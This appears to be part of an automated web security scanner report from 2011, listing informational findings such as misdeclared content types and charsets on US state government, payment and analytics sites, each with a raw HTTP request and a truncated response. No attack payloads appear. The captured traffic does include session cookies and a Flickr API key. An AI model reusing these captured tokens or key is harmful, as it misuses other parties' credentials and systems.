HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:42:50 GMT
Server: OutdoorCentralServer
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 20055


<html>
<head>
<title>GreatLodge.com :: Outdoor Central :: Active Outdoors</title>

<style type=text/css>
.button {font-weight:bold; color:#ffffff; background-color:#006600; border:#000000; border-
...[SNIP]...

28.73. http://www.nhfishandgame.com/nh/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nhfishandgame.com
Path:   /nh/

Request

GET /nh/ HTTP/1.1
Host: www.nhfishandgame.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111112922.1304116995.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=111112922.904209617.1304116995.1304116995.1304116995.1; __utmc=111112922; __utmb=111112922;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:40 GMT
Server: OutdoorCentralServer
Last-Modified: Tue, 18 Jan 2011 21:59:52 GMT
ETag: "54c21e-b95-51c0600"
Accept-Ranges: bytes
Content-Length: 2965
Vary: Accept-Encoding
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html

<HTML>
<HEAD>
<TITLE> The GreatLodge.com Inc </TITLE>
<META NAME="keywords" CONTENT="hunting, fishing, conservation, wilderlands, sportsmen's web portal, Internet hunting and fishing community port
...[SNIP]...

28.74. https://www.paybill.com/payccu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paybill.com
Path:   /payccu/

Request

GET /payccu/ HTTP/1.1
Host: www.paybill.com
Connection: keep-alive
Referer: http://www.maryland.gov/onlineservices/Pages/onlineservices.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:54:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 5323
Content-Type: text/html
Expires: Sat, 30 Apr 2011 00:53:39 GMT
Cache-control: no-cache


<html>
<head>

<title>Maryland Department of Budget & Management</title>


   <link rel="stylesheet" type="text/css" href="../_Themes/205.css">

</head>

<body bottommargin="0" leftmargin=
...[SNIP]...

28.75. http://www.sled.state.sc.us/sled/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sled.state.sc.us
Path:   /sled/default.asp

Request

GET /sled/default.asp HTTP/1.1
Host: www.sled.state.sc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:41:11 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 426
Content-Type: text/html
Set-Cookie: CISESSIONID=c6f5ffb02e2c8078087af7ec0a2c9265ICE370; path=/
Set-Cookie: ASPSESSIONIDASDSSDTS=FFNHDODBCKEILHGEGHEKEHPJ; path=/
Cache-control: private

<html>
<head>
<title>South Carolina Law Enforcement Division</title>
</head>
<script>
parent.banner.location = 'http://www.sled.state.sc.us/sled/default.asp?Category=main&Service=defaultTop';
pa
...[SNIP]...

28.76. http://www.state.nj.us/cgi-bin/corrections/njnewsline/view_article.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /cgi-bin/corrections/njnewsline/view_article.pl

Request

GET /cgi-bin/corrections/njnewsline/view_article.pl HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 30 Apr 2011 12:40:31 GMT
Content-type: text/html
Connection: close

<html><head><title>view_article ERROR</title></head><body><h1>Unexpeced Call</h1>I was expecting an article name to be passed, but did not receive it.</body></html>

28.77. http://www.sus.edu/CatSubCat/CatSubCat.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sus.edu
Path:   /CatSubCat/CatSubCat.asp

Request

GET /CatSubCat/CatSubCat.asp HTTP/1.1
Host: www.sus.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:40:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15055
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCRQTASB=MMPPEHIBJMEGLOECNIIKPHHK; path=/
Cache-control: private


<link rel="stylesheet" href="/Includes/StyleMain.asp" type="text/css" />
<link rel='stylesheet' href='/_CustomFiles/StyleSite.asp' type='text/css' />
<html xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

28.78. http://www.txdot.gov/txdoteforms/GetForm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.txdot.gov
Path:   /txdoteforms/GetForm

Request

GET /txdoteforms/GetForm HTTP/1.1
Host: www.txdot.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:41:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Last-Modified: Fri, 20 Aug 2010 16:31:06 GMT
Content-Length: 2224
Content-Language: en-US
Server: WebSphere Application Server/6.1

<%@ page isErrorPage="true"%>

<html>

<head>
   <title>TxDOT Error Page</title>
   
</head>

<body>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TR>
       <TD><img border="0"
...[SNIP]...

28.79. https://www.vitalchek.com/order_step_js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vitalchek.com
Path:   /order_step_js.aspx

Request

GET /order_step_js.aspx?timestamp=1304125790304&_=1304125790305 HTTP/1.1
Host: www.vitalchek.com
Connection: keep-alive
Referer: https://www.vitalchek.com/order_main.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; ASP.NET_SessionId=ds1bdfytc0khvr45hs3mgz55; site_5_clickid=646829930273374210%2c44155372%2c44155372; __utmz=44146339.1304125733.1.1.utmcsr=dhh.louisiana.gov|utmccn=(referral)|utmcmd=referral|utmcct=/offices/page.asp; __utma=44146339.3347233763592010000.1304125733.1304125733.1304125733.1; __utmc=44146339; __utmb=44146339.2.10.1304125733

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:09:35 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html
Content-Length: 2862

showNameLabel();

jQuery(document).ready(function ($) {
LoadSurveyScript();
});

function showNameLabel()
{
if ($('YesRadio').checked == true) {
if (shoppingCart.currentOrderD
...[SNIP]...

28.80. http://www.webtools.ca.gov/javascript/shared/weather2/weather3.js.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webtools.ca.gov
Path:   /javascript/shared/weather2/weather3.js.asp

Request

GET /javascript/shared/weather2/weather3.js.asp HTTP/1.1
Host: www.webtools.ca.gov
Proxy-Connection: keep-alive
Referer: http://ca.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:09:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1450
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDBDARD=FEDLIDLBJBOJNPACINDMDKJL; path=/
Cache-control: private


document.write('    <div id="weather_container">');
document.write('        <img src="/images/common/weather/partly_cloudy.png" alt="Partly Cloudy" title="Partly Cloudy" class="weather_icon" />');
docu
...[SNIP]...

29. HTML uses unrecognised charset  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.obout.com
Path:   /t2/ht_howto.aspx

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /t2/ht_howto.aspx HTTP/1.1
Host: www.obout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 162593


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_pageHead"><tit
...[SNIP]...
</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /><link rel="stylesheet" href="/css/main.css" type="text/css" media="screen" />
...[SNIP]...

30. Content type incorrectly stated  previous  next
There are 281 instances of this issue:


30.1. http://api.flickr.com/services/rest/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.flickr.com
Path:   /services/rest/

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /services/rest/?method=flickr.groups.pools.getPhotos&api_key=cfadf6e28c3e1402097e15d5d729e6bc&group_id=1085341%40N22&format=json&per_page=4 HTTP/1.1
Host: api.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.kansas.gov/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=9ofvlfh6qmjsk&b=3&s=5t; fldetectedlang=en-us; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:02 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Access-Control-Allow-Origin: *
X-Served-By: www51.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1039

jsonFlickrApi({"photos":{"page":1, "pages":639, "perpage":4, "total":"2555", "photo":[{"id":"5651680835", "owner":"14727556@N07", "secret":"08b29ea4c5", "server":"5184", "farm":6, "title":"Lonely Wind
...[SNIP]...

30.2. https://app.mobilestorm.com/cp/manageforms/preview.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://app.mobilestorm.com
Path:   /cp/manageforms/preview.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /cp/manageforms/preview.php HTTP/1.1
Host: app.mobilestorm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:18:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Length: 24
Connection: close
Content-Type: text/html; charset=UTF-8

Invalid Subscriber Form.

30.3. http://data.gosquared.com/info  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /info

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /info?a=GSN-237422-W&cs=UTF-8&cd=16&fl=10.2%20r154&je=1&la=en-us&sw=1920&sh=1200&dm=www.mo.gov&pa=%2F&pt=MO.gov%20%7C%20Official%20Website%20of%20the%20State%20of%20Missouri&pr=http%3A&pl=0&tl=5805&ri=0&ru=-&ui=1496610374&re=0&vi=1&pv=1&lv=0&un=PUBLIC_TRAFFIC HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:14:43 GMT
Expires: Tue, 05 Apr 2011 11:14:43
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 23

GoSquared.id=1691580001

30.4. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.000009872950613498688/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.000009872950613498688/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.000009872950613498688/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:41:22 GMT
Expires: Tue, 05 Apr 2011 11:41:22
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.5. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.001998334191739559/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.001998334191739559/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.001998334191739559/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:57:09 GMT
Expires: Tue, 05 Apr 2011 11:57:09
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.6. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.0026780031621456146/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.0026780031621456146/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.0026780031621456146/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:33:21 GMT
Expires: Tue, 05 Apr 2011 11:33:21
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.7. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.011548380833119154/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.011548380833119154/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.011548380833119154/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:35:50 GMT
Expires: Tue, 05 Apr 2011 11:35:50
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.8. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.01971346652135253/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.01971346652135253/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.01971346652135253/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:26:09 GMT
Expires: Tue, 05 Apr 2011 11:26:09
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.9. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.022341948002576828/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.022341948002576828/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.022341948002576828/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:34:10 GMT
Expires: Tue, 05 Apr 2011 11:34:10
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.10. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.02552951965481043/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.02552951965481043/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.02552951965481043/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:35:01 GMT
Expires: Tue, 05 Apr 2011 11:35:01
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.11. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.04267080337740481/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.04267080337740481/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.04267080337740481/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:25:19 GMT
Expires: Tue, 05 Apr 2011 11:25:19
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.12. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.04323508660309017/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.04323508660309017/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.04323508660309017/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:30:35 GMT
Expires: Tue, 05 Apr 2011 11:30:35
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.13. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.044262538431212306/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.044262538431212306/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.044262538431212306/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:30:02 GMT
Expires: Tue, 05 Apr 2011 11:30:02
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.14. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.060621748911216855/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.060621748911216855/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.060621748911216855/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:42:28 GMT
Expires: Tue, 05 Apr 2011 11:42:28
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.15. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.06715349410660565/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.06715349410660565/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.06715349410660565/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:48:17 GMT
Expires: Tue, 05 Apr 2011 11:48:17
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.16. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.07685435866005719/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.07685435866005719/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.07685435866005719/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:42:45 GMT
Expires: Tue, 05 Apr 2011 11:42:45
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.17. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.09363480005413294/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.09363480005413294/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.09363480005413294/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
